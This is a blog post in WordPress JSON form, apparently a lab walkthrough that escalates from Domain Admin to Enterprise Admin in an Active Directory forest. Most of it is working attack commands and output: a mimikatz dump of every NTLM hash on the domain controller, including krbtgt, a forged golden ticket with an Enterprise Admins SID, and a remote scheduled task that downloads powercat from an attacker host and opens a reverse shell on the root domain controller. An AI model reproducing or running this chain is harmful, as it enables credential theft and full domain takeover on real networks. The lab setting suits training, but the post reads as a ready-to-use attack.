{"id":895,"date":"2021-01-27T20:36:19","date_gmt":"2021-01-27T20:36:19","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=895"},"modified":"2021-03-02T11:52:36","modified_gmt":"2021-03-02T11:52:36","slug":"escalate-privileges-to-enterprise-admin-2","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/01\/27\/escalate-privileges-to-enterprise-admin-2\/","title":{"rendered":"Escalate Privileges To Enterprise Admin #2"},"content":{"rendered":"<p>An SSK-insured hacker says &quot;So you became Domain Admin? There is an Enterprise Admin waiting for you over there...(de-ja-vu?)&quot;<\/p>\n<p>In the previous post we abused SID History and, with Enterprise Admin rights, used the CIFS service to run the <code>ls<\/code> command on the DC in the root domain. This time the goal is a reverse shell. So how do we do that? The attack format is actually the same; we just use the NTLM hash of krbtgt instead of the trust key. Let's get started!<\/p>\n<p>We are already DA, so let's run a dump with mimikatz on the DC in the child domain...<\/p>\n<pre><code class=\"language-ps1\">[dcorp-dc]: PS C:\\Users\\svcadmin\\Documents&gt; Invoke-Mimikatz -Command &#039;&quot;lsadump::lsa \/patch&quot;&#039;\n\n  .#####.   mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##.  
&quot;A La Vie, A L&#039;Amour&quot; - (oe.eo) ** Kitten Edition **\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       &gt; http:\/\/blog.gentilkiwi.com\/mimikatz\n &#039;## v ##&#039;       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  &#039;#####&#039;        &gt; http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # lsadump::lsa \/patch\nDomain : dcorp \/ S-1-5-21-1874506631-3219952063-538504511\n\nRID  : 000001f4 (500)\nUser : Administrator\nLM   :\nNTLM : af0686cc0ca8f04df42210c9ac980760\n\nRID  : 000001f5 (501)\nUser : Guest\nLM   :\nNTLM :\n\nRID  : 000001f6 (502)\nUser : krbtgt\nLM   :\nNTLM : ff46a9d8bd66c6efd77603da26796f35\n\nRID  : 000001f7 (503)\nUser : DefaultAccount\nLM   :\nNTLM :\n\nRID  : 00000455 (1109)\nUser : ciadmin\nLM   :\nNTLM : e08253add90dccf1a208523d02998c3d\n\nRID  : 00000458 (1112)\nUser : sqladmin\nLM   :\nNTLM : 07e8be316e3da9a042a9cb681df19bf5\n\nRID  : 00000459 (1113)\nUser : websvc\nLM   :\nNTLM : cc098f204c5887eaa8253e7c2749156f\n\nRID  : 0000045b (1115)\nUser : srvadmin\nLM   :\nNTLM : a98e18228819e8eec3dfa33cb68b0728\n\nRID  : 0000045d (1117)\nUser : appadmin\nLM   :\nNTLM : d549831a955fee51a43c83efb3928fa7\n\nRID  : 00000461 (1121)\nUser : mgmtadmin\nLM   :\nNTLM : 95e2cd7ff77379e34c6e46265e75d754\n\nRID  : 00000462 (1122)\nUser : svcadmin\nLM   :\nNTLM : b38ff50264b74508085d82c69794a4d8\n\nRID  : 0000046b (1131)\nUser : studentadmin\nLM   :\nNTLM : d1254f303421d3cdbdc4c73a5bce0201\n\nRID  : 00000470 (1136)\nUser : sql1admin\nLM   :\nNTLM : e999ae4bd06932620a1e78d2112138c6\n\nRID  : 000004bb (1211)\nUser : testda\nLM   :\nNTLM : a16452f790729fa34e8f3a08f234a82c\n\nRID  : 0000b02d (45101)\nUser : Control119user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b02e (45102)\nUser : Control120user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b02f (45103)\nUser : Control121user\nLM   :\nNTLM : 
c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b030 (45104)\nUser : Control122user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b031 (45105)\nUser : Control123user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b032 (45106)\nUser : Control124user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b033 (45107)\nUser : Control125user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b034 (45108)\nUser : Control126user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b035 (45109)\nUser : Control127user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b036 (45110)\nUser : Control128user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b037 (45111)\nUser : Control129user\nLM   :\nNTLM : c8aed8673aca42f9a83ff8d2c84860f0\n\nRID  : 0000b038 (45112)\nUser : Control130user\nLM   :\nNTLM : 64f12cddaa88057e06a81b54e73b949b\n\nRID  : 0000b039 (45113)\nUser : Support119user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b03a (45114)\nUser : Support120user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b03b (45115)\nUser : Support121user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b03c (45116)\nUser : Support122user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b03d (45117)\nUser : Support123user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b03e (45118)\nUser : Support124user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b03f (45119)\nUser : Support125user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b040 (45120)\nUser : Support126user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b041 (45121)\nUser : Support127user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b042 (45122)\nUser : Support128user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b043 (45123)\nUser : Support129user\nLM   :\nNTLM : 
b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b044 (45124)\nUser : Support130user\nLM   :\nNTLM : b2e40f5d46efcbb1094704aeb7d9cbe7\n\nRID  : 0000b045 (45125)\nUser : VPN119user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b046 (45126)\nUser : VPN120user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b047 (45127)\nUser : VPN121user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b048 (45128)\nUser : VPN122user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b049 (45129)\nUser : VPN123user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b04a (45130)\nUser : VPN124user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b04b (45131)\nUser : VPN125user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b04c (45132)\nUser : VPN126user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b04d (45133)\nUser : VPN127user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b04e (45134)\nUser : VPN128user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b04f (45135)\nUser : VPN129user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b050 (45136)\nUser : VPN130user\nLM   :\nNTLM : bb1d7a9ac6d4f535e1986ddbc5428881\n\nRID  : 0000b052 (45138)\nUser : student119\nLM   :\nNTLM : 15fb3d37379865ee2c2ec48b2bdab4dc\n\nRID  : 0000b053 (45139)\nUser : student120\nLM   :\nNTLM : 3ed7cc36e236cbd7bc23ec1f590f7824\n\nRID  : 0000b054 (45140)\nUser : student121\nLM   :\nNTLM : f24a8075f83be221bd45b154deba0a30\n\nRID  : 0000b055 (45141)\nUser : student122\nLM   :\nNTLM : de8324633de5a658386a51bae7e5ee7b\n\nRID  : 0000b056 (45142)\nUser : student123\nLM   :\nNTLM : e46d877c7b0f351f4487af165ebc42af\n\nRID  : 0000b057 (45143)\nUser : student124\nLM   :\nNTLM : fa5e61c40180c65bbbbccef232fd6bcd\n\nRID  : 0000b058 (45144)\nUser : student125\nLM   :\nNTLM : 0c5079bb21ea06b73464f1339083422d\n\nRID  : 0000b059 (45145)\nUser : student126\nLM   :\nNTLM : 
d78f29a72849daca2d8b1e05d6b17cc3\n\nRID  : 0000b05a (45146)\nUser : student127\nLM   :\nNTLM : 3ec6caba66ebc57699e360fb72ba7c9a\n\nRID  : 0000b05b (45147)\nUser : student128\nLM   :\nNTLM : b90831875de23927f54c44824da8e373\n\nRID  : 0000b05c (45148)\nUser : student129\nLM   :\nNTLM : b39bfc4451c0866179f7ce03fcf8f34b\n\nRID  : 0000b05d (45149)\nUser : student130\nLM   :\nNTLM : c4e4d30534c8364fb7906d6f640d0b62\n\nRID  : 000003e8 (1000)\nUser : DCORP-DC$\nLM   :\nNTLM : 044a9b97eb7827ebd84eddb493d2e99b\n\nRID  : 00000454 (1108)\nUser : DCORP-MGMT$\nLM   :\nNTLM : 639c1adde3e0d1ba0d733c7d0d8f23ec\n\nRID  : 00000456 (1110)\nUser : DCORP-CI$\nLM   :\nNTLM : bc7c774ae1c2f9325adee16ff86681fc\n\nRID  : 00000457 (1111)\nUser : DCORP-MSSQL$\nLM   :\nNTLM : 5acf09c93df6805adf482810cc1a38e6\n\nRID  : 0000045a (1114)\nUser : DCORP-ADMINSRV$\nLM   :\nNTLM : 5e77978a734e3a7f3895fb0fdbda3b96\n\nRID  : 00000468 (1128)\nUser : DCORP-APPSRV$\nLM   :\nNTLM : dae2eb887cf962b2907c1273459b58e2\n\nRID  : 0000046f (1135)\nUser : DCORP-SQL1$\nLM   :\nNTLM : 130bb98c073825e0f4924622aa6eda7a\n\nRID  : 00000865 (2149)\nUser : DCORP-STDADM$\nLM   :\nNTLM : ed3005093d910e9413a7f0293df473d3\n\nRID  : 0000b05e (45150)\nUser : DCORP-STD119$\nLM   :\nNTLM : fa57080ed16d628893f7a54d3c2b5391\n\nRID  : 0000b05f (45151)\nUser : DCORP-STD120$\nLM   :\nNTLM : 4d228e9b1693fcb793575e6a9919f591\n\nRID  : 0000b060 (45152)\nUser : DCORP-STD121$\nLM   :\nNTLM : 2f7c3547b8eea381ac502a03a22092fb\n\nRID  : 0000b061 (45153)\nUser : DCORP-STD122$\nLM   :\nNTLM : 6849309385bc87fe3fcb6e4f0e2b154a\n\nRID  : 0000b062 (45154)\nUser : DCORP-STD123$\nLM   :\nNTLM : 6b12c7b8e0d8887fb52005da3f43b378\n\nRID  : 0000b063 (45155)\nUser : DCORP-STD124$\nLM   :\nNTLM : 8db7f6258bc3943c9d0f4b648f9cf455\n\nRID  : 0000b064 (45156)\nUser : DCORP-STD125$\nLM   :\nNTLM : d68b3bf637335b0b2ab85335cdc59e4f\n\nRID  : 0000b065 (45157)\nUser : DCORP-STD126$\nLM   :\nNTLM : a6a69f6bda9a3180c7e49d9eb1a5907b\n\nRID  : 0000b066 (45158)\nUser : 
DCORP-STD127$\nLM   :\nNTLM : 3a3c850c70b743d0d596610d03683ccf\n\nRID  : 0000b067 (45159)\nUser : DCORP-STD128$\nLM   :\nNTLM : 0fad619c814ffeb129913c769d5e36dc\n\nRID  : 0000b068 (45160)\nUser : DCORP-STD129$\nLM   :\nNTLM : 86008b07fdc9308a7d39fd537940dbd7\n\nRID  : 0000b069 (45161)\nUser : DCORP-STD130$\nLM   :\nNTLM : 275969e8e73a86af788a569c0893deb8\n\nRID  : 0000044f (1103)\nUser : mcorp$\nLM   :\nNTLM : fbf363baad2308075117c0fa4ba525ee\n\nRID  : 00000450 (1104)\nUser : us$\nLM   :\nNTLM : d86b6d4c38663e716632bd34373053b4\n\nRID  : 000004bd (1213)\nUser : ecorp$\nLM   :\nNTLM : 74bbc1d7f376d979dae83f0a79682516<\/code><\/pre>\n<p>Great, the value we need is ntlm:ff46a9d8bd66c6efd77603da26796f35<\/p>\n<p>Next, let's get the domain SIDs.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; Import-Module C:\\AD\\PowerSploit\\Recon\\Recon.psd1\nPS C:\\Windows\\system32&gt; Get-DomainSID\nS-1-5-21-1874506631-3219952063-538504511\nPS C:\\Windows\\system32&gt; Get-DomainSID -Domain moneycorp.local\nS-1-5-21-280534878-1496970234-700767426<\/code><\/pre>\n<p>Now let's start the attack with mimikatz and create a ticket. But first, let's run a test.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local\ngwmi : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))\nAt line:1 char:1\n+ gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.lo ...\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException\n    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand\n<\/code><\/pre>\n<p>Yes, we got an error, as expected. 
Now let's create the TGT and load it into RAM.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; Invoke-Mimikatz -Command &#039;&quot;kerberos::golden \/user:Administrator \/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/sids:S-1-5-21-280534878-1496970234-700767426-519 \/krbtgt:ff46a9d8bd66c6efd77603da26796f35 \/ticket:C:\\\nAD\\krbtgt_tkt.kirbi&quot;&#039;\n\n  .#####.   mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##.  &quot;A La Vie, A L&#039;Amour&quot; - (oe.eo) ** Kitten Edition **\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       &gt; http:\/\/blog.gentilkiwi.com\/mimikatz\n &#039;## v ##&#039;       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  &#039;#####&#039;        &gt; http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # kerberos::golden \/user:Administrator \/domain:dollarcorp.moneycorp.local \/sid:S-1-5-21-1874506631-3219952063-538504511 \/sids:S-1-5-21-280534878-1496970234-700767426-519 \/krbtgt:ff46a9d8bd66c6efd77603da26796f35 \/ticket:C:\\AD\\krbtgt_tkt.kirbi\nUser      : Administrator\nDomain    : dollarcorp.moneycorp.local (DOLLARCORP)\nSID       : S-1-5-21-1874506631-3219952063-538504511\nUser Id   : 500\nGroups Id : *513 512 520 518 519\nExtra SIDs: S-1-5-21-280534878-1496970234-700767426-519 ;\nServiceKey: ff46a9d8bd66c6efd77603da26796f35 - rc4_hmac_nt\nLifetime  : 1\/27\/2021 12:28:00 PM ; 1\/25\/2031 12:28:00 PM ; 1\/25\/2031 12:28:00 PM\n-&gt; Ticket : C:\\AD\\krbtgt_tkt.kirbi\n\n * PAC generated\n * PAC signed\n * EncTicketPart generated\n * EncTicketPart encrypted\n * KrbCred generated\n\nFinal Ticket Saved to file !<\/code><\/pre>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; Invoke-Mimikatz -Command &#039;&quot;kerberos::ptt C:\\AD\\krbtgt_tkt.kirbi&quot;&#039;\n\n  .#####.   mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##.  
&quot;A La Vie, A L&#039;Amour&quot; - (oe.eo) ** Kitten Edition **\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       &gt; http:\/\/blog.gentilkiwi.com\/mimikatz\n &#039;## v ##&#039;       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  &#039;#####&#039;        &gt; http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # kerberos::ptt C:\\AD\\krbtgt_tkt.kirbi\n\n* File: &#039;C:\\AD\\krbtgt_tkt.kirbi&#039;: OK<\/code><\/pre>\n<p>Great! Let's repeat the check.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local\n\nSystemDirectory : C:\\Windows\\system32\nOrganization    :\nBuildNumber     : 14393\nRegisteredUser  : Windows User\nSerialNumber    : 00377-80000-00000-AA867\nVersion         : 10.0.14393<\/code><\/pre>\n<p>Is that a reverse shell coming? We can get a reverse shell by creating a scheduled task remotely.<\/p>\n<p>First, let's set up a listener. 
You will need to adjust your firewall settings here.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; Import-Module C:\\AD\\powercat.ps1\nPS C:\\Windows\\system32&gt; powercat -l -v -p 443 -t 10000\nVERBOSE: Set Stream 1: TCP\nVERBOSE: Set Stream 2: Console\nVERBOSE: Setting up Stream 1...\nVERBOSE: Listening on [0.0.0.0] (port 443)\n<\/code><\/pre>\n<p>Next, let's create our task.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; schtasks.exe \/create \/S mcorp-dc.moneycorp.local \/SC Weekly \/RU &quot;NT Authority\\SYSTEM&quot; \/TN &quot;KUDAY4REVERSE&quot; \/TR &quot;powershell.exe -c &#039;iex (New-Object Net.WebClient).DownloadString(&#039;&#039;&#039;http:\/\/172.16.100.130\/powercat.ps1&#039;&#039;&#039;); powercat -c 172.16.100.130 4\n43 -e cmd;&#039;&quot;\nWARNING: The task name &quot;KUDAY4REVERSE&quot; already exists. Do you want to replace it (Y\/N)? y\nSUCCESS: The scheduled task &quot;KUDAY4REVERSE&quot; has successfully been created.<\/code><\/pre>\n<p>And now let's run our task.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; schtasks \/Run \/S mcorp-dc.moneycorp.local \/TN &quot;KUDAY4REVERSE&quot;\nSUCCESS: Attempted to run the scheduled task &quot;KUDAY4REVERSE&quot;.<\/code><\/pre>\n<p>Great! Our reverse shell should arrive now.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; powercat -l -v -p 443 -t 10000\nVERBOSE: Set Stream 1: TCP\nVERBOSE: Set Stream 2: Console\nVERBOSE: Setting up Stream 1...\nVERBOSE: Listening on [0.0.0.0] (port 443)\nVERBOSE: Connection from [172.16.1.1] port  [tcp] accepted (source port 63105)\nVERBOSE: Setting up Stream 2...\nVERBOSE: Both Communication Streams Established. Redirecting Data Between Streams...\nMicrosoft Windows [Version 10.0.14393]\n(c) 2016 Microsoft Corporation. 
All rights reserved.\n\nC:\\Windows\\system32&gt;hostname\nhostname\nmcorp-dc\n\nC:\\Windows\\system32&gt;<\/code><\/pre>\n<p>The rest is up to you...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An SSK-insured hacker says &quot;So you became Domain Admin? There is an Enterprise Admin waiting for you over there&#8230;(de-ja-vu?)&quot; In the previous post we abused SID History and, with Enterprise Admin rights&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/01\/27\/escalate-privileges-to-enterprise-admin-2\/\">Read more<span class=\"screen-reader-text\">Escalate Privileges To Enterprise Admin #2<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269],"tags":[275],"class_list":["post-895","post","type-post","status-publish","format-standard","hentry","category-active-directory","tag-enterprise-admins","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=895"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/895\/revisions"}],"predecessor-version":[{"id":896,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/895\/revisions\/896"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=895"}],"wp:term":[{
"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}